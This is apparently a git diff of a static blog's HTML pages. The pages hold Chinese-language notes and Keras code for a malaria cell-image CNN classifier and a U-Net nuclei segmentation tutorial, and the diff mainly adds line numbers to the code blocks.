              conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(inp)
              pool1 = keras.layers.MaxPooling2D(pool size=(2, 2))(conv1)
              norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
              drop1 = keras.layers.Dropout(rate=0.2)(norm1)
              conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3), activation='relu', padding='same')(drop1)
              pool2 = keras.layers.MaxPooling2D(poo size=(2, 2))(conv2)
              norm2 = keras.layers.BatchNormalization(axis = -1)(pool2)
              drop2 = keras.layers.Dropout(rate=0.2)(norm2)
              flat = keras.layers.Flatten()(drop2)
              hidden1 = keras.layers.Dense(512, activation='relu')(flat)
              norm3 = keras.layers.BatchNormalization(axis = -1)(hidden1)
              drop3 = keras.layers.Dropout(rate=0.2)(norm3)
              hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
              norm4 = keras.layers.BatchNormalization(axis = -1)(hidden2)
              drop4 = keras.layers.Dropout(rate=0.2)(norm4)

              out = keras.layers.Dense(2, activation='sigmoid')(drop4) # units=1gives error
              model = keras.Model(inputs=inp, outputs=out)model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])

              A few keywords to understand:

              • Tensorflow
              • @@ -587,20 +585,20 @@

                import numpy as np
                import cv2
                import os
                from PIL import Image
                import keras

                np.random.seed(1000)
                os.environ['KERAS_BACKEND'] = 'tensorflow' # 将后端设为 tensorflow,如果你想,也可设成 theano
                +
                1
                2
                3
                4
                5
                6
                7
                8
                import numpy as np
                import cv2
                import os
                from PIL import Image
                import keras

                np.random.seed(1000)
                os.environ['KERAS_BACKEND'] = 'tensorflow' # 将后端设为 tensorflow,如果你想,也可设成 theano

                • 尝试导入输入(500 个未收感染的细胞,500 个被感染的细胞)
                -
                image_directory = 'cell_images2/'
                SIZE = 64
                dataset = []
                label = []
                +
                1
                2
                3
                4
                image_directory = 'cell_images2/'
                SIZE = 64
                dataset = []
                label = []
                • 导入被感染的细胞,设为标签0
                -
                parasitized_images = os.listdir(image_directory + 'Parasitized/')
                for i, image_name in enumerate(parasitized_images):
                if image_name.split('.')[1] == 'png': # 如果是 PNG 格式,则读取它
                image = cv2.imread(image_directory + 'Parasitized/' + image_name) # 读取图片,以 np.array格式
                image = Image.fromarray(image, 'RGB') # 将 array 格式转换为 image 格式
                image = image.resize((SIZE, SIZE)) # 变换大小
                dataset.append(np.array(image)) # 录入数据集
                label.append(0) # 录入标签
                +
                1
                2
                3
                4
                5
                6
                7
                8
                parasitized_images = os.listdir(image_directory + 'Parasitized/')
                for i, image_name in enumerate(parasitized_images):
                if image_name.split('.')[1] == 'png': # 如果是 PNG 格式,则读取它
                image = cv2.imread(image_directory + 'Parasitized/' + image_name) # 读取图片,以 np.array格式
                image = Image.fromarray(image, 'RGB') # 将 array 格式转换为 image 格式
                image = image.resize((SIZE, SIZE)) # 变换大小
                dataset.append(np.array(image)) # 录入数据集
                label.append(0) # 录入标签
                • 导入未被感染的细胞,设为标签1
                -
                uninfected_images = os.listdir(image_directory + 'Uninfected/')
                for i, image_name in enumerate(uninfected_images):
                if image_name.split('.')[1] == 'png':
                image = cv2.imread(image_directory + 'Uninfected/' + image_name)
                image = Image.fromarray(image, 'RGB')
                image = image.resize((SIZE, SIZE))
                dataset.append(np.array(image))
                label.append(1)
                +
                1
                2
                3
                4
                5
                6
                7
                8
                uninfected_images = os.listdir(image_directory + 'Uninfected/')
                for i, image_name in enumerate(uninfected_images):
                if image_name.split('.')[1] == 'png':
                image = cv2.imread(image_directory + 'Uninfected/' + image_name)
                image = Image.fromarray(image, 'RGB')
                image = image.resize((SIZE, SIZE))
                dataset.append(np.array(image))
                label.append(1)

                • @@ -613,15 +611,15 @@

                  INPUT_SHAPE = (SIZE, SIZE, 3)
                  inp = keras.layers.Input(shape=INPUT_SHAPE)
                  +
                  1
                  2
                  INPUT_SHAPE = (SIZE, SIZE, 3)
                  inp = keras.layers.Input(shape=INPUT_SHAPE)
                  -
                  conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3),
                  activation='relu', padding='same')(inp)
                  +
                  1
                  2
                  conv1 = keras.layers.Conv2D(32, kernel_size=(3, 3),
                  activation='relu', padding='same')(inp)
                  -
                  pool1 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv1)
                  +
                  1
                  pool1 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv1)
                  • Normalization 1

                    @@ -629,27 +627,27 @@

                    神经网络 BN 层 batch normalization 参数计算_bblingbbling 的博客-CSDN 博客_batchnormalization 参数

                  -
                  norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
                  +
                  1
                  norm1 = keras.layers.BatchNormalization(axis=-1)(pool1)
                  -
                  drop1 = keras.layers.Dropout(rate=0.2)(norm1)
                  +
                  1
                  drop1 = keras.layers.Dropout(rate=0.2)(norm1)
                  • 卷积层 2
                  -
                  conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3),
                  activation='relu', padding='same')(drop1)
                  +
                  1
                  2
                  conv2 = keras.layers.Conv2D(32, kernel_size=(3, 3),
                  activation='relu', padding='same')(drop1)
                  • 池化层 2
                  -
                  pool2 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv2)
                  +
                  1
                  pool2 = keras.layers.MaxPooling2D(pool_size=(2, 2))(conv2)
                  • Normalization 2
                  -
                  norm2 = keras.layers.BatchNormalization(axis=-1)(pool2)
                  +
                  1
                  norm2 = keras.layers.BatchNormalization(axis=-1)(pool2)
                  • Dropout 2
                  -
                  drop2 = keras.layers.Dropout(rate=0.2)(norm2)
                  +
                  1
                  drop2 = keras.layers.Dropout(rate=0.2)(norm2)
                  • Flatten 层 Flatten layer
                      @@ -657,45 +655,45 @@

                      flat = keras.layers.Flatten()(drop2)
                      +
                      1
                      flat = keras.layers.Flatten()(drop2)
                      -
                      hidden1 = keras.layers.Dense(512, activation='relu')(flat)
                      +
                      1
                      hidden1 = keras.layers.Dense(512, activation='relu')(flat)
                      • Normalization 3
                      -
                      norm3 = keras.layers.BatchNormalization(axis=-1)(hidden1)
                      +
                      1
                      norm3 = keras.layers.BatchNormalization(axis=-1)(hidden1)
                      • Dropout 3
                      -
                      drop3 = keras.layers.Dropout(rate=0.2)(norm3)
                      +
                      1
                      drop3 = keras.layers.Dropout(rate=0.2)(norm3)
                      • 隐藏层 2
                      -
                      hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
                      +
                      1
                      hidden2 = keras.layers.Dense(256, activation='relu')(drop3)
                      • Normalization 4
                      -
                      norm4 = keras.layers.BatchNormalization(axis=-1)(hidden2)
                      +
                      1
                      norm4 = keras.layers.BatchNormalization(axis=-1)(hidden2)
                      • Drop 4
                      -
                      drop4 = keras.layers.Dropout(rate=0.2)(norm4)
                      +
                      1
                      drop4 = keras.layers.Dropout(rate=0.2)(norm4)
                      • 输出层
                      -
                      out = keras.layers.Dense(2, activation='sigmoid')(drop4)
                      +
                      1
                      out = keras.layers.Dense(2, activation='sigmoid')(drop4)
                      -
                      model = keras.Model(inputs=inp, outputs=out)
                      model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
                      +
                      1
                      2
                      model = keras.Model(inputs=inp, outputs=out)
                      model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
                      -
                      from tensorflow.keras import utils
                      from keras.utils.vis_utils import model_to_dot

                      utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)
                      +
                      1
                      2
                      3
                      4
                      from tensorflow.keras import utils
                      from keras.utils.vis_utils import model_to_dot

                      utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)

                      png

                      -
                      model.summary()
                      +
                      1
                      model.summary()
                      Model: "model"
                       _________________________________________________________________
                        Layer (type)                Output Shape              Param #   
                      @@ -920,8 +918,8 @@ 

                      from sklearn.model_selection import train_test_split
                      from keras.utils import to_categorical

                      X_train, X_test, y_train, y_test = train_test_split(dataset,
                      to_categorical(np.array(label)),
                      test_size = 0.20,
                      random_state = 0)
                      -
                      history = model.fit(np.array(X_train), y_train, batch_size=64, verbose=1, epochs=25, validation_split=0.1, shuffle=False)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      from sklearn.model_selection import train_test_split
                      from keras.utils import to_categorical

                      X_train, X_test, y_train, y_test = train_test_split(dataset,
                      to_categorical(np.array(label)),
                      test_size = 0.20,
                      random_state = 0)
                      +
                      1
                      history = model.fit(np.array(X_train), y_train, batch_size=64, verbose=1, epochs=25, validation_split=0.1, shuffle=False)
                      Epoch 1/25
                       12/12 [==============================] - 9s 99ms/step - loss: 0.9405 - accuracy: 0.6444 - val_loss: 31.2568 - val_accuracy: 0.5625
                       Epoch 2/25
                      @@ -977,18 +975,18 @@ 

                      print("Test_Accuracy: {:.2f}%".format(model.evaluate(np.array(X_test), np.array(y_test))[1]*100))
                      +
                      1
                      print("Test_Accuracy: {:.2f}%".format(model.evaluate(np.array(X_test), np.array(y_test))[1]*100))
                      7/7 [==============================] - 0s 17ms/step - loss: 1.7793 - accuracy: 0.6950
                       Test_Accuracy: 69.50%
                       
                      -
                      import matplotlib.pyplot as plt

                      f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))
                      t = f.suptitle('CNN Performance', fontsize=12)
                      f.subplots_adjust(top=0.85, wspace=0.3)

                      # 绘制训练 & 验证的准确率值
                      max_epoch = len(history.history['accuracy'])+1
                      epoch_list = list(range(1,max_epoch))
                      ax1.plot(epoch_list, history.history['accuracy'], label='Train Accuracy')
                      ax1.plot(epoch_list, history.history['val_accuracy'], label='Validation Accuracy')
                      ax1.set_xticks(np.arange(1, max_epoch, 5))
                      ax1.set_ylabel('Accuracy Value')
                      ax1.set_xlabel('Epoch')
                      ax1.set_title('Accuracy')
                      l1 = ax1.legend(loc="best")

                      # 绘制训练 & 验证的损失值
                      ax2.plot(epoch_list, history.history['loss'], label='Train Loss')
                      ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')
                      ax2.set_xticks(np.arange(1, max_epoch, 5))
                      ax2.set_ylabel('Loss Value')
                      ax2.set_xlabel('Epoch')
                      ax2.set_title('Loss')
                      l2 = ax2.legend(loc="best")
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      import matplotlib.pyplot as plt

                      f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))
                      t = f.suptitle('CNN Performance', fontsize=12)
                      f.subplots_adjust(top=0.85, wspace=0.3)

                      # 绘制训练 & 验证的准确率值
                      max_epoch = len(history.history['accuracy'])+1
                      epoch_list = list(range(1,max_epoch))
                      ax1.plot(epoch_list, history.history['accuracy'], label='Train Accuracy')
                      ax1.plot(epoch_list, history.history['val_accuracy'], label='Validation Accuracy')
                      ax1.set_xticks(np.arange(1, max_epoch, 5))
                      ax1.set_ylabel('Accuracy Value')
                      ax1.set_xlabel('Epoch')
                      ax1.set_title('Accuracy')
                      l1 = ax1.legend(loc="best")

                      # 绘制训练 & 验证的损失值
                      ax2.plot(epoch_list, history.history['loss'], label='Train Loss')
                      ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')
                      ax2.set_xticks(np.arange(1, max_epoch, 5))
                      ax2.set_ylabel('Loss Value')
                      ax2.set_xlabel('Epoch')
                      ax2.set_title('Loss')
                      l2 = ax2.legend(loc="best")

                      png

                      可以推断出 epoch 次数过多,出现了过拟合现象。


                      • 保存模型
                      -
                      model.save('malaria_cnn.h5')
                      +
                      1
                      model.save('malaria_cnn.h5')

                      png

                      @@ -5022,6 +5020,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(73-78)-U-net/index.html b/posts/DIP-Python tutorials for image processing and machine learning(73-78)-U-net/index.html index d917562aeb..f9a792e9e1 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(73-78)-U-net/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(73-78)-U-net/index.html @@ -44,8 +44,6 @@ - - @@ -414,7 +412,7 @@

                      74 - Image Segmentation using U-Net - Part 2 -Defining U-Net in Python using Keras-

                      -
                      import tensorflow as tf

                      IMG_WIDTH = 128
                      IMG_HEIGHT = 128
                      IMG_CHANNELS = 3
                      +
                      1
                      2
                      3
                      4
                      5
                      import tensorflow as tf

                      IMG_WIDTH = 128
                      IMG_HEIGHT = 128
                      IMG_CHANNELS = 3

                      建立模型

                      • @@ -424,7 +422,7 @@

                        concatenate 连接层

                      -
                      inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
                      s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

                      # Contraction path 收缩路径
                      c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
                      c1 = tf.keras.layers.Dropout(0.1)(c1)
                      c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
                      p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

                      c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
                      c2 = tf.keras.layers.Dropout(0.1)(c2)
                      c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
                      p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

                      c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
                      c3 = tf.keras.layers.Dropout(0.2)(c3)
                      c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
                      p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

                      c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
                      c4 = tf.keras.layers.Dropout(0.2)(c4)
                      c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
                      p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

                      c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
                      c5 = tf.keras.layers.Dropout(0.3)(c5)
                      c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

                      # Expansive path 延展路径
                      u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
                      u6 = tf.keras.layers.concatenate([u6, c4])
                      c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
                      c6 = tf.keras.layers.Dropout(0.2)(c6)
                      c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

                      u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
                      u7 = tf.keras.layers.concatenate([u7, c3])
                      c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
                      c7 = tf.keras.layers.Dropout(0.2)(c7)
                      c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

                      u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
                      u8 = tf.keras.layers.concatenate([u8, c2])
                      c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
                      c8 = tf.keras.layers.Dropout(0.1)(c8)
                      c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

                      u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
                      u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
                      c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
                      c9 = tf.keras.layers.Dropout(0.1)(c9)
                      c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

                      outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

                      model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
                      model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
                      model.summary()
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      37
                      38
                      39
                      40
                      41
                      42
                      43
                      44
                      45
                      46
                      47
                      48
                      49
                      50
                      51
                      52
                      53
                      54
                      55
                      56
                      57
                      58
                      inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
                      s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

                      # Contraction path 收缩路径
                      c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
                      c1 = tf.keras.layers.Dropout(0.1)(c1)
                      c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
                      p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

                      c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
                      c2 = tf.keras.layers.Dropout(0.1)(c2)
                      c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
                      p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

                      c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
                      c3 = tf.keras.layers.Dropout(0.2)(c3)
                      c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
                      p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

                      c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
                      c4 = tf.keras.layers.Dropout(0.2)(c4)
                      c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
                      p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

                      c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
                      c5 = tf.keras.layers.Dropout(0.3)(c5)
                      c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)

                      # Expansive path 延展路径
                      u6 = tf.keras.layers.Conv2DTranspose(128, (2, 2), strides=(2, 2), padding='same')(c5)
                      u6 = tf.keras.layers.concatenate([u6, c4])
                      c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
                      c6 = tf.keras.layers.Dropout(0.2)(c6)
                      c6 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)

                      u7 = tf.keras.layers.Conv2DTranspose(64, (2, 2), strides=(2, 2), padding='same')(c6)
                      u7 = tf.keras.layers.concatenate([u7, c3])
                      c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
                      c7 = tf.keras.layers.Dropout(0.2)(c7)
                      c7 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)

                      u8 = tf.keras.layers.Conv2DTranspose(32, (2, 2), strides=(2, 2), padding='same')(c7)
                      u8 = tf.keras.layers.concatenate([u8, c2])
                      c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
                      c8 = tf.keras.layers.Dropout(0.1)(c8)
                      c8 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)

                      u9 = tf.keras.layers.Conv2DTranspose(16, (2, 2), strides=(2, 2), padding='same')(c8)
                      u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
                      c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
                      c9 = tf.keras.layers.Dropout(0.1)(c9)
                      c9 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)

                      outputs = tf.keras.layers.Conv2D(1, (1, 1), activation='sigmoid')(c9)

                      model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
                      model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
                      model.summary()
                      Model: "model"
                       __________________________________________________________________________________________________
                        Layer (type)                   Output Shape         Param #     Connected to                     
                      @@ -534,7 +532,7 @@ 

                      from tensorflow.keras import utils
                      from keras.utils.vis_utils import model_to_dot

                      utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)
                      +
                      1
                      2
                      3
                      4
                      from tensorflow.keras import utils
                      from keras.utils.vis_utils import model_to_dot

                      utils.plot_model(model, 'model1.png',show_shapes=True,show_dtype=True,show_layer_names=True)

                      png

                      75 - Image Segmentation using U-Net - Part 3 -What are trainable parameters-

                      ​ 介绍了神经网络中参数量是怎么算的。

                      @@ -548,23 +546,23 @@

                      Module: tf.keras.callbacks | TensorFlow v2.11.0 (google.cn)

                    -
                    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
                    callbacks = [
                    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
                    tf.keras.callbacks.TensorBoard(log_dir='logs')
                    ]
                    +
                    1
                    2
                    3
                    4
                    5
                    checkpointer = tf.keras.callbacks.ModelCheckpoint('model_for_nuclei.h5', verbose=1, save_best_only=True)
                    callbacks = [
                    tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
                    tf.keras.callbacks.TensorBoard(log_dir='logs')
                    ]

                    77 - Image Segmentation using U-Net - Part 5 -Understanding the data-

                    获取数据集:2018 Data Science Bowl | Kaggle

                    78 - Image Segmentation using U-Net - Part 6 -Running the code and understanding results-

                    -
                    import tensorflow as tf
                    import os
                    import numpy as np

                    IMG_WIDTH = 128
                    IMG_HEIGHT = 128
                    IMG_CHANNELS = 3

                    TRAIN_PATH = 'stage1_train/'
                    TEST_PATH = 'stage1_test/'

                    train_ids = next(os.walk(TRAIN_PATH))[1]
                    test_ids = next(os.walk(TEST_PATH))[1]

                    X_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
                    Y_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_) # y 是一个二值图像
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    import tensorflow as tf
                    import os
                    import numpy as np

                    IMG_WIDTH = 128
                    IMG_HEIGHT = 128
                    IMG_CHANNELS = 3

                    TRAIN_PATH = 'stage1_train/'
                    TEST_PATH = 'stage1_test/'

                    train_ids = next(os.walk(TRAIN_PATH))[1]
                    test_ids = next(os.walk(TEST_PATH))[1]

                    X_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
                    Y_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_) # y 是一个二值图像

                    Resizing training images and masks

                    -
                    import random
                    from tqdm import tqdm
                    from skimage.io import imread, imshow
                    from skimage.transform import resize
                    import matplotlib.pyplot as plt

                    seed = 42
                    np.random.seed = seed

                    print('Resizing training images and masks')
                    for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):
                    path = TRAIN_PATH + id_
                    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS] # 读取图像
                    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True) # 将图像大小修改为 128x128
                    X_train[n] = img # Fill empty X_train with values from img
                    mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_)
                    for mask_file in next(os.walk(path + '/masks/'))[2]:
                    mask_ = imread(path + '/masks/' + mask_file)
                    mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
                    preserve_range=True), axis=-1)
                    mask = np.maximum(mask, mask_)

                    Y_train[n] = mask # Fill empty Y_train with values from img
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    12
                    13
                    14
                    15
                    16
                    17
                    18
                    19
                    20
                    21
                    22
                    23
                    import random
                    from tqdm import tqdm
                    from skimage.io import imread, imshow
                    from skimage.transform import resize
                    import matplotlib.pyplot as plt

                    seed = 42
                    np.random.seed = seed

                    print('Resizing training images and masks')
                    for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):
                    path = TRAIN_PATH + id_
                    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS] # 读取图像
                    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True) # 将图像大小修改为 128x128
                    X_train[n] = img # Fill empty X_train with values from img
                    mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool_)
                    for mask_file in next(os.walk(path + '/masks/'))[2]:
                    mask_ = imread(path + '/masks/' + mask_file)
                    mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
                    preserve_range=True), axis=-1)
                    mask = np.maximum(mask, mask_)

                    Y_train[n] = mask # Fill empty Y_train with values from img
                    Resizing training images and masks
                     
                     
                     100%|██████████| 670/670 [04:38<00:00,  2.41it/s]
                     

                    Resizing test images

                    -
                    X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
                    sizes_test = []
                    print('Resizing test images')
                    for n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):
                    path = TEST_PATH + id_
                    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
                    sizes_test.append([img.shape[0], img.shape[1]])
                    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
                    X_test[n] = img

                    print('Done!')
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    11
                    X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
                    sizes_test = []
                    print('Resizing test images')
                    for n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):
                    path = TEST_PATH + id_
                    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
                    sizes_test.append([img.shape[0], img.shape[1]])
                    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
                    X_test[n] = img

                    print('Done!')
                    Resizing test images
                     
                     
                    @@ -574,17 +572,17 @@ 

                    image_x = random.randint(0, len(train_ids))
                    imshow(X_train[image_x])
                    plt.show()
                    +
                    1
                    2
                    3
                    image_x = random.randint(0, len(train_ids))
                    imshow(X_train[image_x])
                    plt.show()

                    png

                    -
                    imshow(np.squeeze(Y_train[image_x]))
                    plt.show()
                    +
                    1
                    2
                    imshow(np.squeeze(Y_train[image_x]))
                    plt.show()

                    png

                    -
                    inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
                    s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs) # 将整数转换成浮点数

                    # Contraction path 收缩路径
                    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
                    c1 = tf.keras.layers.Dropout(0.1)(c1)
                    c1 = tf.keras.layers.Conv2D(16, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
                    p1 = tf.keras.layers.MaxPooling2D((2, 2))(c1)

                    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
                    c2 = tf.keras.layers.Dropout(0.1)(c2)
                    c2 = tf.keras.layers.Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
                    p2 = tf.keras.layers.MaxPooling2D((2, 2))(c2)

                    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
                    c3 = tf.keras.layers.Dropout(0.2)(c3)
                    c3 = tf.keras.layers.Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
                    p3 = tf.keras.layers.MaxPooling2D((2, 2))(c3)

                    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
                    c4 = tf.keras.layers.Dropout(0.2)(c4)
                    c4 = tf.keras.layers.Conv2D(128, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
                    p4 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(c4)

                    c5 = tf.keras.layers.Conv2D(256, (3, 3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
                    c5 = tf.keras.layers.Dropout(0.3)(c5)
